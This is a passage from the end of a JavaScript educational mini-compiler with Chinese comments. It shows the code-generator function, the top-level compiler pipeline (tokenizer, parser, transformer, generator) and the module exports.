771 | function codeGenerator(node) {
772 | 
773 |   // 根据节点类型区分
774 |   switch (node.type) {
775 | 
776 |     // 递归
777 |     case 'Program':
778 |       return node.body.map(codeGenerator)
779 |         .join('\n');
780 | 
781 |     // 对于`ExpressionStatement`，我们需要递归调用，并添加一个分号符号。
782 |     case 'ExpressionStatement':
783 |       return (
784 |         codeGenerator(node.expression) +
785 |         ';' // << (...因为我们希望能正确编码)
786 |       );
787 | 
788 |     case 'CallExpression':
789 |       return (
790 |         codeGenerator(node.callee) +
791 |         '(' +
792 |         node.arguments.map(codeGenerator)
793 |           .join(', ') +
794 |         ')'
795 |       );
796 | 
797 |     // 函数名
798 |     case 'Identifier':
799 |       return node.name;
800 | 
801 |     // 数字
802 |     case 'NumberLiteral':
803 |       return node.value;
804 | 
805 |     // 字符串
806 |     case 'StringLiteral':
807 |       return '"' + node.value + '"';
808 | 
809 |     // 未识别的节点
810 |     default:
811 |       throw new TypeError(node.type);
812 |   }
813 | }
814 | 
815 | /**
816 |  * ============================================================================
817 |  *                                  (۶* ‘ヮ’)۶”
818 |  *                            !!!!!!!!编译器!!!!!!!!
819 |  * ============================================================================
820 |  */
821 | 
822 | /**
823 |  * 最终，我们终于完成了我们的编译器函数。下面展示了流程
824 |  *
825 |  *   1. input  => tokenizer   => tokens
826 |  *   2. tokens => parser      => ast
827 |  *   3. ast    => transformer => newAst
828 |  *   4. newAst => generator   => output
829 |  */
830 | 
831 | function compiler(input) {
832 |   let tokens = tokenizer(input);
833 |   let ast    = parser(tokens);
834 |   let newAst = transformer(ast);
835 |   let output = codeGenerator(newAst);
836 | 
837 |   // 返回输出
838 |   return output;
839 | }
840 | 
841 | /**
842 |  * ============================================================================
843 |  *                                   (๑˃̵ᴗ˂̵)و
844 |  * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!成功了!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!s
845 |  * ============================================================================
846 |  */
847 | 
848 | // 输出所有模块
849 | module.exports = {
850 |   tokenizer,
851 |   parser,
852 |   traverser,
853 |   transformer,
854 |   codeGenerator,
855 |   compiler,
856 | };


--------------------------------------------------------------------------------